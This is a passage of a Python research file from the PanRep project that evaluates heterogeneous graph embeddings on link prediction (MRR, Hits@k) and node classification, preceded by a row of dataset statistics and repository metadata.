| 21 | 31 | 0.68254 | 9 | 63 | 4.666667 | 0.666667 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 63 | 2 | 32 | 31.5 | 0.857143 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
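The `__init__.py` above re-exports names with `from .browser import *` (the `# noqa` comment silences linter warnings about star imports). A hedged sketch, using a hypothetical module built on the fly and named `mod`, of how `__all__` determines exactly which names such a star import binds:

```python
import sys
import types

# Hypothetical module "mod" with one public and one private function.
mod = types.ModuleType("mod")
exec(
    "__all__ = ['public_fn']\n"
    "def public_fn():\n"
    "    return 42\n"
    "def _private():\n"
    "    return 0\n",
    mod.__dict__,
)
sys.modules["mod"] = mod

# `from mod import *` binds exactly the names listed in __all__:
exported = {name: getattr(mod, name) for name in getattr(mod, "__all__", [])}
```

Here only `public_fn` is exported; `_private` remains reachable as `mod._private` but is never pulled in by the star import.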
d9966b7415918ffd0d110c683f27ab1ba0a3755b | 58,054 | py | Python | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 10 | 2020-12-18T22:53:43.000Z | 2021-12-13T19:07:25.000Z | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | null | null | null | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 1 | 2021-10-30T12:33:55.000Z | 2021-10-30T12:33:55.000Z | '''
This file contains functions to evaluate the link prediction and node classification tasks.
'''
import time
import dgl
import numpy as np
import torch
import torch as th
from sklearn.cluster import KMeans
from sklearn.metrics import f1_score, normalized_mutual_info_score, adjusted_rand_score, roc_auc_score
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from torch.nn import functional as F
from torch.utils.data import DataLoader
from classifiers import DLinkPredictorOnlyRel, ClassifierMLP
from node_sampling_masking import InfomaxNodeRecNeighborSampler, LinkPredictorEvalSampler
def evaluation_link_prediction_wembeds(test_g, model, embeddings, train_edges, valid_edges, test_edges, dim_size, eval_neg_cnt, n_layers, device):
def transform_triplets(train_edges,etype2id,ntype2id):
train_src = None
# TODO have to map the etype and ntype to their integer ids.
for key in train_edges.keys():
if train_src is None:
train_src = train_edges[key][0]
train_dst = train_edges[key][1]
train_rel = th.tensor(etype2id[key[1]]).repeat((train_src.shape[0]))
train_src_type = th.tensor(ntype2id[key[0]]).repeat((train_src.shape[0]))
train_dst_type = th.tensor(ntype2id[key[2]]).repeat((train_src.shape[0]))
else:
train_src = torch.cat((train_src, train_edges[key][0]))
train_dst = torch.cat((train_dst, train_edges[key][1]))
train_rel = torch.cat((train_rel, th.tensor(etype2id[key[1]]).repeat((train_edges[key][0].shape[0]))))
train_src_type = torch.cat(
(train_src_type, th.tensor(ntype2id[key[0]]).repeat((train_edges[key][0].shape[0]))))
train_dst_type = torch.cat(
(train_dst_type, th.tensor(ntype2id[key[2]]).repeat((train_edges[key][0].shape[0]))))
        perm = torch.randperm(train_src.shape[0])
        train_src = train_src[perm]
        train_dst = train_dst[perm]
        train_src_type = train_src_type[perm]
        train_rel = train_rel[perm]
        train_dst_type = train_dst_type[perm]
        return (train_src, train_dst, train_src_type, train_rel, train_dst_type)
def prepare_triplets(train_data, valid_data, test_data):
if len(train_data) == 3:
train_src, train_rel, train_dst = train_data
train_htypes = None
train_ttypes = None
else:
assert len(train_data) == 5
train_src, train_dst, train_src_type, train_rel, train_dst_type = train_data
train_htypes = (train_src_type)
train_ttypes = (train_dst_type)
head_ids = (train_src)
tail_ids = (train_dst)
etypes = (train_rel)
num_train_edges = etypes.shape[0]
# pos_seed = th.arange(batch_size * 5000) #num_train_edges//batch_size) * batch_size)
if len(valid_data) == 3:
valid_src, valid_rel, valid_dst = valid_data
valid_htypes = None
valid_ttypes = None
valid_neg_htypes = None
valid_neg_ttypes = None
else:
assert len(valid_data) == 5
            valid_src, valid_dst, valid_src_type, valid_rel, valid_dst_type = valid_data
            valid_htypes = valid_src_type
            valid_ttypes = valid_dst_type
valid_neg_htypes = th.cat([train_htypes, valid_htypes])
valid_neg_ttypes = th.cat([train_ttypes, valid_ttypes])
valid_head_ids = (valid_src)
valid_tail_ids = (valid_dst)
valid_etypes = (valid_rel)
valid_neg_head_ids = th.cat([head_ids, valid_head_ids])
valid_neg_tail_ids = th.cat([tail_ids, valid_tail_ids])
valid_neg_etypes = th.cat([etypes, valid_etypes])
num_valid_edges = valid_etypes.shape[0] + num_train_edges
valid_seed = th.arange(valid_etypes.shape[0])
if len(test_data) == 3:
test_src, test_rel, test_dst = test_data
test_htypes = None
test_ttypes = None
test_neg_htypes = None
test_neg_ttypes = None
else:
assert len(test_data) == 5
test_src, test_dst, test_src_type, test_rel, test_dst_type = test_data
test_htypes = (test_src_type)
test_ttypes = (test_dst_type)
test_neg_htypes = th.cat([valid_neg_htypes, test_htypes])
test_neg_ttypes = th.cat([valid_neg_ttypes, test_ttypes])
test_head_ids = (test_src)
test_tail_ids = (test_dst)
test_etypes = (test_rel)
test_neg_head_ids = th.cat([valid_neg_head_ids, test_head_ids])
test_neg_tail_ids = th.cat([valid_neg_tail_ids, test_tail_ids])
test_neg_etypes = th.cat([valid_neg_etypes, test_etypes])
pos_pairs = (test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes)
neg_pairs = (test_neg_head_ids, test_neg_etypes, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes)
return pos_pairs, neg_pairs
def creat_eval_minibatch(test_g, n_layers):
eval_minibatch_blocks = []
eval_minibatch_info = []
for ntype in test_g.ntypes:
n_nodes = test_g.number_of_nodes(ntype)
eval_minibatch = 512
for i in range(int((n_nodes + eval_minibatch - 1) // eval_minibatch)):
cur = {}
valid_blocks = []
cur[ntype] = th.arange(i * eval_minibatch,
(i + 1) * eval_minibatch \
if (i + 1) * eval_minibatch < n_nodes \
else n_nodes)
# record the seed
eval_minibatch_info.append((ntype, cur[ntype]))
for _ in range(n_layers):
#print(cur)
frontier = dgl.in_subgraph(test_g, cur)
block = dgl.to_block(frontier, cur)
cur = {}
for s_ntype in block.srctypes:
cur[s_ntype] = block.srcnodes[s_ntype].data[dgl.NID]
block=block.to(device)
valid_blocks.insert(0, block)
eval_minibatch_blocks.append(valid_blocks)
for i in range(len(eval_minibatch_blocks)):
for ntype in eval_minibatch_blocks[i][0].ntypes:
if eval_minibatch_blocks[i][0].number_of_src_nodes(ntype)>0:
if test_g.nodes[ntype].data.get("h_f", None) is not None:
eval_minibatch_blocks[i][0].srcnodes[ntype].data['h_f'] = test_g.nodes[ntype].data['h_f'][
eval_minibatch_blocks[i][0].srcnodes[ntype].data['_ID']].to(device)
return eval_minibatch_info, eval_minibatch_blocks
def fullgraph_eval(eval_g, model,embeddings, device, dim_size,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id):
model.eval()
t0 = time.time()
p_h = embeddings
with th.no_grad():
test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes = pos_pairs
test_neg_head_ids, _, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes = neg_pairs
mrr = 0
mr = 0
hit1 = 0
hit3 = 0
hit10 = 0
pos_batch_size = 1000
pos_cnt = test_head_ids.shape[0]
total_cnt = 0
# unique test head and tail nodes
if test_htypes is None:
unique_neg_head_ids = th.unique(test_neg_head_ids)
unique_neg_tail_ids = th.unique(test_neg_tail_ids)
unique_neg_htypes = None
unique_neg_ttypes = None
else:
unique_neg_head_ids = []
unique_neg_tail_ids = []
unique_neg_htypes = []
unique_neg_ttypes = []
for nt in eval_g.ntypes:
cols = (test_neg_htypes == ntype2id[nt])
unique_ids = th.unique(test_neg_head_ids[cols])
unique_neg_head_ids.append(unique_ids)
unique_neg_htypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
cols = (test_neg_ttypes == ntype2id[nt])
unique_ids = th.unique(test_neg_tail_ids[cols])
unique_neg_tail_ids.append(unique_ids)
unique_neg_ttypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
unique_neg_head_ids = th.cat(unique_neg_head_ids)
unique_neg_tail_ids = th.cat(unique_neg_tail_ids)
unique_neg_htypes = th.cat(unique_neg_htypes)
unique_neg_ttypes = th.cat(unique_neg_ttypes)
if eval_neg_cnt > 0:
total_neg_head_seed = th.randint(unique_neg_head_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
total_neg_tail_seed = th.randint(unique_neg_tail_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
for p_i in range(int((pos_cnt + pos_batch_size - 1) // pos_batch_size)):
print("Eval {}-{}".format(p_i * pos_batch_size,
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt))
sub_test_head_ids = test_head_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_etypes = test_etypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_tail_ids = test_tail_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
if test_htypes is None:
phead_emb = p_h['node'][sub_test_head_ids]
ptail_emb = p_h['node'][sub_test_tail_ids]
else:
sub_test_htypes = test_htypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_ttypes = test_ttypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
phead_emb = th.empty((sub_test_head_ids.shape[0], dim_size), device=device)
ptail_emb = th.empty((sub_test_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_htypes == ntype2id[nt])
phead_emb[loc] = p_h[nt][sub_test_head_ids[loc]]
loc = (sub_test_ttypes == ntype2id[nt])
ptail_emb[loc] = p_h[nt][sub_test_tail_ids[loc]]
pos_scores = model.calc_pos_score_with_rids(phead_emb, ptail_emb, sub_test_etypes,etype2id,device)
pos_scores = F.logsigmoid(pos_scores).reshape(phead_emb.shape[0], -1).detach().cpu()
if eval_neg_cnt > 0:
neg_head_seed = total_neg_head_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
neg_tail_seed = total_neg_tail_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
seed_test_neg_head_ids = unique_neg_head_ids[neg_head_seed]
seed_test_neg_tail_ids = unique_neg_tail_ids[neg_tail_seed]
if test_neg_htypes is not None:
seed_test_neg_htypes = unique_neg_htypes[neg_head_seed]
seed_test_neg_ttypes = unique_neg_ttypes[neg_tail_seed]
else:
seed_test_neg_head_ids = unique_neg_head_ids
seed_test_neg_tail_ids = unique_neg_tail_ids
seed_test_neg_htypes = unique_neg_htypes
seed_test_neg_ttypes = unique_neg_ttypes
neg_batch_size = 10000
head_neg_cnt = seed_test_neg_head_ids.shape[0]
tail_neg_cnt = seed_test_neg_tail_ids.shape[0]
t_neg_score = []
h_neg_score = []
for n_i in range(int((head_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_head_ids = seed_test_neg_head_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
if test_htypes is None:
nhead_emb = p_h['node'][sub_test_neg_head_ids]
else:
sub_test_neg_htypes = seed_test_neg_htypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
nhead_emb = th.empty((sub_test_neg_head_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_htypes == ntype2id[nt])
nhead_emb[loc] = p_h[nt][sub_test_neg_head_ids[loc]]
h_neg_score.append(
model.calc_neg_head_score(nhead_emb,
ptail_emb,
sub_test_etypes,
1,
ptail_emb.shape[0],
nhead_emb.shape[0],etype2id,device).reshape(-1, nhead_emb.shape[
0]).detach().cpu())
for n_i in range(int((tail_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_tail_ids = seed_test_neg_tail_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
if test_htypes is None:
ntail_emb = p_h['node'][sub_test_neg_tail_ids]
else:
sub_test_neg_ttypes = seed_test_neg_ttypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
ntail_emb = th.empty((sub_test_neg_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_ttypes == ntype2id[nt])
ntail_emb[loc] = p_h[nt][sub_test_neg_tail_ids[loc]]
t_neg_score.append(model.calc_neg_tail_score(phead_emb,
ntail_emb,
sub_test_etypes,
1,
phead_emb.shape[0],
ntail_emb.shape[0],etype2id,device).reshape(-1, ntail_emb.shape[
0]).detach().cpu())
t_neg_score = th.cat(t_neg_score, dim=1)
h_neg_score = th.cat(h_neg_score, dim=1)
t_neg_score = F.logsigmoid(t_neg_score)
h_neg_score = F.logsigmoid(h_neg_score)
canonical_etypes = eval_g.canonical_etypes
for idx in range(phead_emb.shape[0]):
if test_htypes is None:
tail_pos = eval_g.has_edges_between(
th.full((seed_test_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
seed_test_neg_tail_ids,
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
head_pos = eval_g.has_edges_between(seed_test_neg_head_ids,
th.full((seed_test_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
loc = tail_pos == 1
t_neg_score[idx][loc] += pos_scores[idx]
loc = head_pos == 1
h_neg_score[idx][loc] += pos_scores[idx]
else:
                        head_type = test_g.ntypes[sub_test_htypes[idx].numpy().item()]
                        tail_type = test_g.ntypes[sub_test_ttypes[idx].numpy().item()]
for t in eval_g.ntypes:
if (head_type, test_g.etypes[(sub_test_etypes[idx].numpy().item())], t) in canonical_etypes:
loc = (seed_test_neg_ttypes == ntype2id[t])
t_neg_tail_ids = seed_test_neg_tail_ids[loc]
# there is some neg tail in this type
if t_neg_tail_ids.shape[0] > 0:
tail_pos = eval_g.has_edges_between(
th.full((t_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
t_neg_tail_ids,
etype=(head_type,
test_g.etypes[(sub_test_etypes[idx].numpy().item())],
t))
t_neg_score[idx][loc][tail_pos == 1] += pos_scores[idx]
if (t, test_g.etypes[(sub_test_etypes[idx].numpy().item())], tail_type) in canonical_etypes:
loc = (seed_test_neg_htypes == ntype2id[t])
t_neg_head_ids = seed_test_neg_head_ids[loc]
# there is some neg head in this type
if t_neg_head_ids.shape[0] > 0:
head_pos = eval_g.has_edges_between(t_neg_head_ids,
th.full((t_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=(t,
test_g.etypes[(sub_test_etypes[idx].numpy().item())]
,
tail_type))
h_neg_score[idx][loc][head_pos == 1] += pos_scores[idx]
neg_score = th.cat([h_neg_score, t_neg_score], dim=1)
rankings = th.sum(neg_score >= pos_scores, dim=1) + 1
rankings = rankings.cpu().detach().numpy()
for ranking in rankings:
mrr += 1.0 / ranking
mr += float(ranking)
hit1 += 1.0 if ranking <= 1 else 0.0
hit3 += 1.0 if ranking <= 3 else 0.0
hit10 += 1.0 if ranking <= 10 else 0.0
total_cnt += 1
            res = "MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(
                mrr / total_cnt, mr / total_cnt, hit1 / total_cnt,
                hit3 / total_cnt, hit10 / total_cnt)
            print(res)
t1 = time.time()
        print("Full eval {} examples takes {} seconds".format(pos_scores.shape[0], t1 - t0))
return res
    ntype2id = {ntype: i for i, ntype in enumerate(test_g.ntypes)}
    etype2id = {etype: i for i, etype in enumerate(test_g.etypes)}
    train_data = transform_triplets(train_edges, etype2id, ntype2id)
    valid_data = transform_triplets(valid_edges, etype2id, ntype2id)
    test_data = transform_triplets(test_edges, etype2id, ntype2id)
    pos_pairs, neg_pairs = prepare_triplets(train_data, valid_data, test_data)
    # minibatch_info, minibatch_blocks = creat_eval_minibatch(test_g, n_layers)
    res = fullgraph_eval(test_g, model, embeddings, device, dim_size,
                         pos_pairs, neg_pairs, eval_neg_cnt, ntype2id, etype2id)
return res
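The evaluator above derives all of its metrics from `rankings = th.sum(neg_score >= pos_scores, dim=1) + 1`. A minimal plain-Python sketch of the same MRR/MR/Hits@k computation on toy scores (not the model's actual scoring functions):

```python
def rank_metrics(pos_scores, neg_scores):
    """For each positive edge, rank its score against its negative candidates,
    then average MRR, MR and Hits@{1,3,10} over all positives."""
    mrr = mr = hit1 = hit3 = hit10 = 0.0
    for pos, negs in zip(pos_scores, neg_scores):
        # rank = 1 + number of negatives scoring at least as high as the positive
        ranking = 1 + sum(1 for n in negs if n >= pos)
        mrr += 1.0 / ranking
        mr += float(ranking)
        hit1 += 1.0 if ranking <= 1 else 0.0
        hit3 += 1.0 if ranking <= 3 else 0.0
        hit10 += 1.0 if ranking <= 10 else 0.0
    cnt = len(pos_scores)
    return {"MRR": mrr / cnt, "MR": mr / cnt,
            "HITS@1": hit1 / cnt, "HITS@3": hit3 / cnt, "HITS@10": hit10 / cnt}

# Toy scores: the first positive beats both negatives, the second ranks 2nd.
m = rank_metrics([0.9, 0.5], [[0.1, 0.2], [0.7, 0.3]])
# m["MRR"] == 0.75, m["MR"] == 1.5
```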
def evaluate_panrep_fn_for_node_classification(model, val_loader, device, labels, category, loss_func, multilabel=False):
    model.eval()
    total_acc = 0
    total_loss = 0
    count = 0
for i, (seeds, blocks) in enumerate(val_loader):
# need to copy the features
        for j in range(len(blocks)):
            blocks[j] = blocks[j].to(device)
lbl = labels[seeds[category]]
logits = model.classifier_forward_mb(blocks)[category]
loss = loss_func(logits, lbl)
pred = torch.sigmoid(logits)
        if not multilabel:
            pred = pred.argmax(dim=1)
acc = compute_acc(pred, lbl, multilabel)
total_acc += acc
total_loss += loss.item() * len(seeds)
pred = pred.cpu().numpy()
        count += len(seeds)
    return total_loss / count, total_acc / count
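`compute_acc` is called above but neither defined nor imported in this excerpt. A hypothetical stand-in (the real helper may differ) that returns the number of correct predictions, so the caller's `total_acc / count` yields accuracy:

```python
def compute_acc(pred, labels, multilabel=False):
    """Hypothetical sketch of the `compute_acc` helper used above.
    Single-label: `pred` holds predicted class ids.
    Multilabel: `pred` holds per-class probabilities, thresholded at 0.5.
    Returns the count of correctly predicted examples (not a fraction)."""
    if multilabel:
        return sum(
            all((p >= 0.5) == bool(l) for p, l in zip(row_p, row_l))
            for row_p, row_l in zip(pred, labels)
        )
    return sum(int(p == l) for p, l in zip(pred, labels))

single = compute_acc([0, 1, 1], [0, 1, 0])  # 2 of 3 predictions match
multi = compute_acc([[0.9, 0.1], [0.2, 0.8]], [[1, 0], [0, 1]], multilabel=True)  # both rows correct
```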
def evaluation_link_prediction(test_g, model, train_edges, valid_edges, test_edges, dim_size, eval_neg_cnt, n_layers, device):
def transform_triplets(train_edges,etype2id,ntype2id):
train_src = None
# TODO have to map the etype and ntype to their integer ids.
for key in train_edges.keys():
if train_src is None:
train_src = train_edges[key][0]
train_dst = train_edges[key][1]
train_rel = th.tensor(etype2id[key[1]]).repeat((train_src.shape[0]))
train_src_type = th.tensor(ntype2id[key[0]]).repeat((train_src.shape[0]))
train_dst_type = th.tensor(ntype2id[key[2]]).repeat((train_src.shape[0]))
else:
train_src = torch.cat((train_src, train_edges[key][0]))
train_dst = torch.cat((train_dst, train_edges[key][1]))
train_rel = torch.cat((train_rel, th.tensor(etype2id[key[1]]).repeat((train_edges[key][0].shape[0]))))
train_src_type = torch.cat(
(train_src_type, th.tensor(ntype2id[key[0]]).repeat((train_edges[key][0].shape[0]))))
train_dst_type = torch.cat(
(train_dst_type, th.tensor(ntype2id[key[2]]).repeat((train_edges[key][0].shape[0]))))
        perm = torch.randperm(train_src.shape[0])
        train_src = train_src[perm]
        train_dst = train_dst[perm]
        train_src_type = train_src_type[perm]
        train_rel = train_rel[perm]
        train_dst_type = train_dst_type[perm]
        return (train_src, train_dst, train_src_type, train_rel, train_dst_type)
def prepare_triplets(train_data, valid_data, test_data):
if len(train_data) == 3:
train_src, train_rel, train_dst = train_data
train_htypes = None
train_ttypes = None
else:
assert len(train_data) == 5
train_src, train_dst, train_src_type, train_rel, train_dst_type = train_data
train_htypes = (train_src_type)
train_ttypes = (train_dst_type)
head_ids = (train_src)
tail_ids = (train_dst)
etypes = (train_rel)
num_train_edges = etypes.shape[0]
# pos_seed = th.arange(batch_size * 5000) #num_train_edges//batch_size) * batch_size)
if len(valid_data) == 3:
valid_src, valid_rel, valid_dst = valid_data
valid_htypes = None
valid_ttypes = None
valid_neg_htypes = None
valid_neg_ttypes = None
else:
assert len(valid_data) == 5
            valid_src, valid_dst, valid_src_type, valid_rel, valid_dst_type = valid_data
            valid_htypes = valid_src_type
            valid_ttypes = valid_dst_type
valid_neg_htypes = th.cat([train_htypes, valid_htypes])
valid_neg_ttypes = th.cat([train_ttypes, valid_ttypes])
valid_head_ids = (valid_src)
valid_tail_ids = (valid_dst)
valid_etypes = (valid_rel)
valid_neg_head_ids = th.cat([head_ids, valid_head_ids])
valid_neg_tail_ids = th.cat([tail_ids, valid_tail_ids])
valid_neg_etypes = th.cat([etypes, valid_etypes])
num_valid_edges = valid_etypes.shape[0] + num_train_edges
valid_seed = th.arange(valid_etypes.shape[0])
if len(test_data) == 3:
test_src, test_rel, test_dst = test_data
test_htypes = None
test_ttypes = None
test_neg_htypes = None
test_neg_ttypes = None
else:
assert len(test_data) == 5
test_src, test_dst, test_src_type, test_rel, test_dst_type = test_data
test_htypes = (test_src_type)
test_ttypes = (test_dst_type)
test_neg_htypes = th.cat([valid_neg_htypes, test_htypes])
test_neg_ttypes = th.cat([valid_neg_ttypes, test_ttypes])
test_head_ids = (test_src)
test_tail_ids = (test_dst)
test_etypes = (test_rel)
test_neg_head_ids = th.cat([valid_neg_head_ids, test_head_ids])
test_neg_tail_ids = th.cat([valid_neg_tail_ids, test_tail_ids])
test_neg_etypes = th.cat([valid_neg_etypes, test_etypes])
pos_pairs = (test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes)
neg_pairs = (test_neg_head_ids, test_neg_etypes, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes)
return pos_pairs, neg_pairs
def creat_eval_minibatch(test_g, n_layers):
eval_minibatch_blocks = []
eval_minibatch_info = []
for ntype in test_g.ntypes:
n_nodes = test_g.number_of_nodes(ntype)
eval_minibatch = 512
for i in range(int((n_nodes + eval_minibatch - 1) // eval_minibatch)):
cur = {}
valid_blocks = []
cur[ntype] = th.arange(i * eval_minibatch,
(i + 1) * eval_minibatch \
if (i + 1) * eval_minibatch < n_nodes \
else n_nodes)
# record the seed
eval_minibatch_info.append((ntype, cur[ntype]))
for _ in range(n_layers):
#print(cur)
frontier = dgl.in_subgraph(test_g, cur)
block = dgl.to_block(frontier, cur)
cur = {}
for s_ntype in block.srctypes:
cur[s_ntype] = block.srcnodes[s_ntype].data[dgl.NID]
block=block.to(device)
valid_blocks.insert(0, block)
eval_minibatch_blocks.append(valid_blocks)
for i in range(len(eval_minibatch_blocks)):
for ntype in eval_minibatch_blocks[i][0].ntypes:
if eval_minibatch_blocks[i][0].number_of_src_nodes(ntype)>0:
if test_g.nodes[ntype].data.get("h_f", None) is not None:
eval_minibatch_blocks[i][0].srcnodes[ntype].data['h_f'] = test_g.nodes[ntype].data['h_f'][
eval_minibatch_blocks[i][0].srcnodes[ntype].data['_ID']].to(device)
return eval_minibatch_info, eval_minibatch_blocks
def fullgraph_eval(eval_g, model, device, dim_size, minibatch_blocks, minibatch_info,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id):
model.eval()
t0 = time.time()
p_h = {}
with th.no_grad():
for i, blocks in enumerate(minibatch_blocks):
mp_h = model.encoder.forward_mb(blocks)
mini_ntype, mini_idx = minibatch_info[i]
if p_h.get(mini_ntype, None) is None:
p_h[mini_ntype] = th.empty((eval_g.number_of_nodes(mini_ntype), dim_size), device=device)
p_h[mini_ntype][mini_idx] = mp_h[mini_ntype]
test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes = pos_pairs
test_neg_head_ids, _, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes = neg_pairs
mrr = 0
mr = 0
hit1 = 0
hit3 = 0
hit10 = 0
pos_batch_size = 1000
pos_cnt = test_head_ids.shape[0]
total_cnt = 0
# unique test head and tail nodes
if test_htypes is None:
unique_neg_head_ids = th.unique(test_neg_head_ids)
unique_neg_tail_ids = th.unique(test_neg_tail_ids)
unique_neg_htypes = None
unique_neg_ttypes = None
else:
unique_neg_head_ids = []
unique_neg_tail_ids = []
unique_neg_htypes = []
unique_neg_ttypes = []
for nt in eval_g.ntypes:
cols = (test_neg_htypes == ntype2id[nt])
unique_ids = th.unique(test_neg_head_ids[cols])
unique_neg_head_ids.append(unique_ids)
unique_neg_htypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
cols = (test_neg_ttypes == ntype2id[nt])
unique_ids = th.unique(test_neg_tail_ids[cols])
unique_neg_tail_ids.append(unique_ids)
unique_neg_ttypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
unique_neg_head_ids = th.cat(unique_neg_head_ids)
unique_neg_tail_ids = th.cat(unique_neg_tail_ids)
unique_neg_htypes = th.cat(unique_neg_htypes)
unique_neg_ttypes = th.cat(unique_neg_ttypes)
if eval_neg_cnt > 0:
total_neg_head_seed = th.randint(unique_neg_head_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
total_neg_tail_seed = th.randint(unique_neg_tail_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
for p_i in range(int((pos_cnt + pos_batch_size - 1) // pos_batch_size)):
print("Eval {}-{}".format(p_i * pos_batch_size,
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt))
sub_test_head_ids = test_head_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_etypes = test_etypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_tail_ids = test_tail_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
if test_htypes is None:
phead_emb = p_h['node'][sub_test_head_ids]
ptail_emb = p_h['node'][sub_test_tail_ids]
else:
sub_test_htypes = test_htypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_ttypes = test_ttypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
phead_emb = th.empty((sub_test_head_ids.shape[0], dim_size), device=device)
ptail_emb = th.empty((sub_test_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_htypes == ntype2id[nt])
phead_emb[loc] = p_h[nt][sub_test_head_ids[loc]]
loc = (sub_test_ttypes == ntype2id[nt])
ptail_emb[loc] = p_h[nt][sub_test_tail_ids[loc]]
pos_scores = model.linkPredictor.calc_pos_score_with_rids(phead_emb, ptail_emb, sub_test_etypes,etype2id,device)
pos_scores = F.logsigmoid(pos_scores).reshape(phead_emb.shape[0], -1).detach().cpu()
if eval_neg_cnt > 0:
neg_head_seed = total_neg_head_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
neg_tail_seed = total_neg_tail_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
seed_test_neg_head_ids = unique_neg_head_ids[neg_head_seed]
seed_test_neg_tail_ids = unique_neg_tail_ids[neg_tail_seed]
if test_neg_htypes is not None:
seed_test_neg_htypes = unique_neg_htypes[neg_head_seed]
seed_test_neg_ttypes = unique_neg_ttypes[neg_tail_seed]
else:
seed_test_neg_head_ids = unique_neg_head_ids
seed_test_neg_tail_ids = unique_neg_tail_ids
seed_test_neg_htypes = unique_neg_htypes
seed_test_neg_ttypes = unique_neg_ttypes
neg_batch_size = 10000
head_neg_cnt = seed_test_neg_head_ids.shape[0]
tail_neg_cnt = seed_test_neg_tail_ids.shape[0]
t_neg_score = []
h_neg_score = []
for n_i in range(int((head_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_head_ids = seed_test_neg_head_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
